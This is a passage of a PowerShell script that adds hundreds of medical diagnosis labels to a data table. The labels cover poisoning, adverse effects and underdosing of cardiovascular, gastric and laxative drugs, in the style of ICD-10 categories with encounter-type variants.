antiarteriosclerotic drugs, assault","Poisoning by antihyperlipidemic and antiarteriosclerotic drugs, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antihyperlipidemic and antiarteriosclerotic drugs, undetermined","Poisoning by antihyperlipidemic and antiarteriosclerotic drugs, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antihyperlipidemic and antiarteriosclerotic drugs, undetermined","Poisoning by antihyperlipidemic and antiarteriosclerotic drugs, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antihyperlipidemic and antiarteriosclerotic drugs, undetermined","Poisoning by antihyperlipidemic and antiarteriosclerotic drugs, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of antihyperlipidemic and antiarteriosclerotic drugs","Adverse effect of antihyperlipidemic and antiarteriosclerotic drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antihyperlipidemic and antiarteriosclerotic drugs","Adverse effect of antihyperlipidemic and antiarteriosclerotic drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antihyperlipidemic and antiarteriosclerotic drugs","Adverse effect of antihyperlipidemic and antiarteriosclerotic drugs, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of antihyperlipidemic and antiarteriosclerotic drugs","Underdosing of antihyperlipidemic and antiarteriosclerotic drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antihyperlipidemic and antiarteriosclerotic drugs","Underdosing of antihyperlipidemic and antiarteriosclerotic drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antihyperlipidemic and antiarteriosclerotic drugs","Underdosing of antihyperlipidemic and antiarteriosclerotic drugs, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by peripheral vasodilators, accidental (unintentional)","Poisoning by peripheral vasodilators, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by peripheral vasodilators, accidental (unintentional)","Poisoning by peripheral vasodilators, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by peripheral vasodilators, accidental (unintentional)","Poisoning by peripheral vasodilators, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by peripheral vasodilators, intentional self-harm","Poisoning by peripheral vasodilators, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by peripheral vasodilators, intentional self-harm","Poisoning by peripheral vasodilators, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by peripheral vasodilators, intentional self-harm","Poisoning by peripheral vasodilators, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by peripheral vasodilators, assault","Poisoning by peripheral vasodilators, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by peripheral vasodilators, assault","Poisoning by peripheral vasodilators, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by peripheral vasodilators, assault","Poisoning by peripheral vasodilators, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by peripheral vasodilators, undetermined","Poisoning by peripheral vasodilators, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by peripheral vasodilators, undetermined","Poisoning by peripheral vasodilators, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by peripheral vasodilators, undetermined","Poisoning by peripheral vasodilators, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of peripheral vasodilators","Adverse effect of peripheral vasodilators, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of peripheral vasodilators","Adverse effect of peripheral vasodilators, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of peripheral vasodilators","Adverse effect of peripheral vasodilators, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of peripheral vasodilators","Underdosing of peripheral vasodilators, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of peripheral vasodilators","Underdosing of peripheral vasodilators, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of peripheral vasodilators","Underdosing of peripheral vasodilators, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antivaricose drugs, including sclerosing agents, accidental (unintentional)","Poisoning by antivaricose drugs, including sclerosing agents, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antivaricose drugs, including sclerosing agents, accidental (unintentional)","Poisoning by antivaricose drugs, including sclerosing agents, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antivaricose drugs, including sclerosing agents, accidental (unintentional)","Poisoning by antivaricose drugs, including sclerosing agents, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antivaricose drugs, including sclerosing agents, intentional self-harm","Poisoning by antivaricose drugs, including sclerosing agents, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antivaricose drugs, including sclerosing agents, intentional self-harm","Poisoning by antivaricose drugs, including sclerosing agents, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antivaricose drugs, including sclerosing agents, intentional self-harm","Poisoning by antivaricose drugs, including sclerosing agents, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antivaricose drugs, including sclerosing agents, assault","Poisoning by antivaricose drugs, including sclerosing agents, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antivaricose drugs, including sclerosing agents, assault","Poisoning by antivaricose drugs, including sclerosing agents, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antivaricose drugs, including sclerosing agents, assault","Poisoning by antivaricose drugs, including sclerosing agents, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antivaricose drugs, including sclerosing agents, undetermined","Poisoning by antivaricose drugs, including sclerosing agents, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antivaricose drugs, including sclerosing agents, undetermined","Poisoning by antivaricose drugs, including sclerosing agents, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antivaricose drugs, including sclerosing agents, undetermined","Poisoning by antivaricose drugs, including sclerosing agents, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of antivaricose drugs, including sclerosing agents","Adverse effect of antivaricose drugs, including sclerosing agents, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antivaricose drugs, including sclerosing agents","Adverse effect of antivaricose drugs, including sclerosing agents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antivaricose drugs, including sclerosing agents","Adverse effect of antivaricose drugs, including sclerosing agents, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of antivaricose drugs, including sclerosing agents","Underdosing of antivaricose drugs, including sclerosing agents, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antivaricose drugs, including sclerosing agents","Underdosing of antivaricose drugs, including sclerosing agents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antivaricose drugs, including sclerosing agents","Underdosing of antivaricose drugs, including sclerosing agents, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily affecting the cardiovascular system, accidental (unintentional)","Poisoning by unspecified agents primarily affecting the cardiovascular system, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily affecting the cardiovascular system, accidental (unintentional)","Poisoning by unspecified agents primarily affecting the cardiovascular system, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily affecting the cardiovascular system, accidental (unintentional)","Poisoning by unspecified agents primarily affecting the cardiovascular system, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily affecting the cardiovascular system, intentional self-harm","Poisoning by unspecified agents primarily affecting the cardiovascular system, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily affecting the cardiovascular system, intentional self-harm","Poisoning by unspecified agents primarily affecting the cardiovascular system, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily affecting the cardiovascular system, intentional self-harm","Poisoning by unspecified agents primarily affecting the cardiovascular system, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily affecting the cardiovascular system, assault","Poisoning by unspecified agents primarily affecting the cardiovascular system, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily affecting the cardiovascular system, assault","Poisoning by unspecified agents primarily affecting the cardiovascular system, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily affecting the cardiovascular system, assault","Poisoning by unspecified agents primarily affecting the cardiovascular system, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily affecting the cardiovascular system, undetermined","Poisoning by unspecified agents primarily affecting the cardiovascular system, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily affecting the cardiovascular system, undetermined","Poisoning by unspecified agents primarily affecting the cardiovascular system, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily affecting the cardiovascular system, undetermined","Poisoning by unspecified agents primarily affecting the cardiovascular system, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified agents primarily affecting the cardiovascular system","Adverse effect of unspecified agents primarily affecting the cardiovascular system, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified agents primarily affecting the cardiovascular system","Adverse effect of unspecified agents primarily affecting the cardiovascular system, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified agents primarily affecting the cardiovascular system","Adverse effect of unspecified agents primarily affecting the cardiovascular system, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified agents primarily affecting the cardiovascular system","Underdosing of unspecified agents primarily affecting the cardiovascular system, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified agents primarily affecting the cardiovascular system","Underdosing of unspecified agents primarily affecting the cardiovascular system, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified agents primarily affecting the cardiovascular system","Underdosing of unspecified agents primarily affecting the cardiovascular system, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily affecting the cardiovascular system, accidental (unintentional)","Poisoning by other agents primarily affecting the cardiovascular system, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily affecting the cardiovascular system, accidental (unintentional)","Poisoning by other agents primarily affecting the cardiovascular system, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily affecting the cardiovascular system, accidental (unintentional)","Poisoning by other agents primarily affecting the cardiovascular system, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily affecting the cardiovascular system, intentional self-harm","Poisoning by other agents primarily affecting the cardiovascular system, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily affecting the cardiovascular system, intentional self-harm","Poisoning by other agents primarily affecting the cardiovascular system, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily affecting the cardiovascular system, intentional self-harm","Poisoning by other agents primarily affecting the cardiovascular system, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily affecting the cardiovascular system, assault","Poisoning by other agents primarily affecting the cardiovascular system, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily affecting the cardiovascular system, assault","Poisoning by other agents primarily affecting the cardiovascular system, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily affecting the cardiovascular system, assault","Poisoning by other agents primarily affecting the cardiovascular system, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily affecting the cardiovascular system, undetermined","Poisoning by other agents primarily affecting the cardiovascular system, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily affecting the cardiovascular system, undetermined","Poisoning by other agents primarily affecting the cardiovascular system, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily affecting the cardiovascular system, undetermined","Poisoning by other agents primarily affecting the cardiovascular system, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other agents primarily affecting the cardiovascular system","Adverse effect of other agents primarily affecting the cardiovascular system, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other agents primarily affecting the cardiovascular system","Adverse effect of other agents primarily affecting the cardiovascular system, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other agents primarily affecting the cardiovascular system","Adverse effect of other agents primarily affecting the cardiovascular system, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other agents primarily affecting the cardiovascular system","Underdosing of other agents primarily affecting the cardiovascular system, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other agents primarily affecting the cardiovascular system","Underdosing of other agents primarily affecting the cardiovascular system, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other agents primarily affecting the cardiovascular system","Underdosing of other agents primarily affecting the cardiovascular system, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by histamine H2-receptor blockers, accidental (unintentional)","Poisoning by histamine H2-receptor blockers, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by histamine H2-receptor blockers, accidental (unintentional)","Poisoning by histamine H2-receptor blockers, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by histamine H2-receptor blockers, accidental (unintentional)","Poisoning by histamine H2-receptor blockers, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by histamine H2-receptor blockers, intentional self-harm","Poisoning by histamine H2-receptor blockers, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by histamine H2-receptor blockers, intentional self-harm","Poisoning by histamine H2-receptor blockers, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by histamine H2-receptor blockers, intentional self-harm","Poisoning by histamine H2-receptor blockers, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by histamine H2-receptor blockers, assault","Poisoning by histamine H2-receptor blockers, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by histamine H2-receptor blockers, assault","Poisoning by histamine H2-receptor blockers, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by histamine H2-receptor blockers, assault","Poisoning by histamine H2-receptor blockers, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by histamine H2-receptor blockers, undetermined","Poisoning by histamine H2-receptor blockers, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by histamine H2-receptor blockers, undetermined","Poisoning by histamine H2-receptor blockers, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by histamine H2-receptor blockers, undetermined","Poisoning by histamine H2-receptor blockers, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of histamine H2-receptor blockers","Adverse effect of histamine H2-receptor blockers, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of histamine H2-receptor blockers","Adverse effect of histamine H2-receptor blockers, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of histamine H2-receptor blockers","Adverse effect of histamine H2-receptor blockers, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of histamine H2-receptor blockers","Underdosing of histamine H2-receptor blockers, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of histamine H2-receptor blockers","Underdosing of histamine H2-receptor blockers, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of histamine H2-receptor blockers","Underdosing of histamine H2-receptor blockers, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other antacids and anti-gastric-secretion drugs, accidental (unintentional)","Poisoning by other antacids and anti-gastric-secretion drugs, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antacids and anti-gastric-secretion drugs, accidental (unintentional)","Poisoning by other antacids and anti-gastric-secretion drugs, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antacids and anti-gastric-secretion drugs, accidental (unintentional)","Poisoning by other antacids and anti-gastric-secretion drugs, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other antacids and anti-gastric-secretion drugs, intentional self-harm","Poisoning by other antacids and anti-gastric-secretion drugs, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antacids and anti-gastric-secretion drugs, intentional self-harm","Poisoning by other antacids and anti-gastric-secretion drugs, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antacids and anti-gastric-secretion drugs, intentional self-harm","Poisoning by other antacids and anti-gastric-secretion drugs, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other antacids and anti-gastric-secretion drugs, assault","Poisoning by other antacids and anti-gastric-secretion drugs, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antacids and anti-gastric-secretion drugs, assault","Poisoning by other antacids and anti-gastric-secretion drugs, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antacids and anti-gastric-secretion drugs, assault","Poisoning by other antacids and anti-gastric-secretion drugs, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other antacids and anti-gastric-secretion drugs, undetermined","Poisoning by other antacids and anti-gastric-secretion drugs, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antacids and anti-gastric-secretion drugs, undetermined","Poisoning by other antacids and anti-gastric-secretion drugs, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antacids and anti-gastric-secretion drugs, undetermined","Poisoning by other antacids and anti-gastric-secretion drugs, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other antacids and anti-gastric-secretion drugs","Adverse effect of other antacids and anti-gastric-secretion drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other antacids and anti-gastric-secretion drugs","Adverse effect of other antacids and anti-gastric-secretion drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other antacids and anti-gastric-secretion drugs","Adverse effect of other antacids and anti-gastric-secretion drugs, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other antacids and anti-gastric-secretion drugs","Underdosing of other antacids and anti-gastric-secretion drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other antacids and anti-gastric-secretion drugs","Underdosing of other antacids and anti-gastric-secretion drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other antacids and anti-gastric-secretion drugs","Underdosing of other antacids and anti-gastric-secretion drugs, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by stimulant laxatives, accidental (unintentional)","Poisoning by stimulant laxatives, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by stimulant laxatives, accidental (unintentional)","Poisoning by stimulant laxatives, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by stimulant laxatives, accidental (unintentional)","Poisoning by stimulant laxatives, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by stimulant laxatives, intentional self-harm","Poisoning by stimulant laxatives, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by stimulant laxatives, intentional self-harm","Poisoning by stimulant laxatives, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by stimulant laxatives, intentional self-harm","Poisoning by stimulant laxatives, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by stimulant laxatives, assault","Poisoning by stimulant laxatives, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by stimulant laxatives, assault","Poisoning by stimulant laxatives, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by stimulant laxatives, assault","Poisoning by stimulant laxatives, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by stimulant laxatives, undetermined","Poisoning by stimulant laxatives, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by stimulant laxatives, undetermined","Poisoning by stimulant laxatives, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by stimulant laxatives, undetermined","Poisoning by stimulant laxatives, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of stimulant laxatives","Adverse effect of stimulant laxatives, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of stimulant laxatives","Adverse effect of stimulant laxatives, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of stimulant laxatives","Adverse effect of stimulant laxatives, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of stimulant laxatives","Underdosing of stimulant laxatives, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of stimulant laxatives","Underdosing of stimulant laxatives, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of stimulant laxatives","Underdosing of stimulant laxatives, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by saline and osmotic laxatives, accidental (unintentional)","Poisoning by saline and osmotic laxatives, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by saline and osmotic laxatives, accidental (unintentional)","Poisoning by saline and osmotic laxatives, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by saline and osmotic laxatives, accidental (unintentional)","Poisoning by saline and osmotic laxatives, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by saline and osmotic laxatives, intentional self-harm","Poisoning by saline and osmotic laxatives, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by saline and osmotic laxatives, intentional self-harm","Poisoning by saline and osmotic laxatives, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by saline and osmotic laxatives, intentional self-harm","Poisoning by saline and osmotic laxatives, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by saline and osmotic laxatives, assault","Poisoning by saline and osmotic laxatives, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by saline and osmotic laxatives, assault","Poisoning by saline and osmotic laxatives, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by saline and osmotic laxatives, assault","Poisoning by saline and osmotic laxatives, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by saline and osmotic laxatives, undetermined","Poisoning by saline and osmotic laxatives, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by saline and osmotic laxatives, undetermined","Poisoning by saline and osmotic laxatives, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by saline and osmotic laxatives, undetermined","Poisoning by saline and osmotic laxatives, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of saline and osmotic laxatives","Adverse effect of saline and osmotic laxatives, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of saline and osmotic laxatives","Adverse effect of saline and osmotic laxatives, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of saline and osmotic laxatives","Adverse effect of saline and osmotic laxatives, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of saline and osmotic laxatives","Underdosing of saline and osmotic laxatives, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of saline and osmotic laxatives","Underdosing of saline and osmotic laxatives, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of saline and osmotic laxatives","Underdosing of saline and osmotic laxatives, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other laxatives, accidental (unintentional)","Poisoning by other laxatives, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other laxatives, accidental (unintentional)","Poisoning by other laxatives, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other laxatives, accidental (unintentional)","Poisoning by other laxatives, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other laxatives, intentional self-harm","Poisoning by other laxatives, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other laxatives, intentional self-harm","Poisoning by other laxatives, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other laxatives, intentional self-harm","Poisoning by other laxatives, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other laxatives, assault","Poisoning by other laxatives, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other laxatives, assault","Poisoning by other laxatives, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other laxatives, assault","Poisoning by other laxatives, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other laxatives, undetermined","Poisoning by other laxatives, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other laxatives, undetermined","Poisoning by other laxatives, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other laxatives, undetermined","Poisoning by other laxatives, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other laxatives","Adverse effect of other laxatives, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other laxatives","Adverse effect of other laxatives, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other laxatives","Adverse effect of other laxatives, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other laxatives","Underdosing of other laxatives, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other laxatives","Underdosing of other laxatives, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other laxatives","Underdosing of other laxatives, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by digestants, accidental (unintentional)","Poisoning by digestants, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by digestants, accidental (unintentional)","Poisoning by digestants, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by digestants, accidental (unintentional)","Poisoning by digestants, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by digestants, intentional self-harm","Poisoning by digestants, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by digestants, intentional self-harm","Poisoning by digestants, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by digestants, intentional self-harm","Poisoning by digestants, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by digestants, assault","Poisoning by digestants, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by digestants, assault","Poisoning by digestants, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by digestants, assault","Poisoning by digestants, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by digestants, undetermined","Poisoning by digestants, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by digestants, undetermined","Poisoning by digestants, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by digestants, undetermined","Poisoning by digestants, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of digestants","Adverse effect of digestants, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of digestants","Adverse effect of digestants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of digestants","Adverse effect of digestants, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of digestants","Underdosing of digestants, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of digestants","Underdosing of digestants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of digestants","Underdosing of digestants, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antidiarrheal drugs, accidental (unintentional)","Poisoning by antidiarrheal drugs, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antidiarrheal drugs, accidental (unintentional)","Poisoning by antidiarrheal drugs, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antidiarrheal drugs, accidental (unintentional)","Poisoning by antidiarrheal drugs, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antidiarrheal drugs, intentional self-harm","Poisoning by antidiarrheal drugs, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antidiarrheal drugs, intentional self-harm","Poisoning by antidiarrheal drugs, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antidiarrheal drugs, intentional self-harm","Poisoning by antidiarrheal drugs, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antidiarrheal drugs, assault","Poisoning by antidiarrheal drugs, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antidiarrheal drugs, assault","Poisoning by antidiarrheal drugs, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antidiarrheal drugs, assault","Poisoning by antidiarrheal drugs, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antidiarrheal drugs, undetermined","Poisoning by antidiarrheal drugs, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antidiarrheal drugs, undetermined","Poisoning by antidiarrheal drugs, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antidiarrheal drugs, undetermined","Poisoning by antidiarrheal drugs, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of antidiarrheal drugs","Adverse effect of antidiarrheal drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antidiarrheal drugs","Adverse effect of antidiarrheal drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect 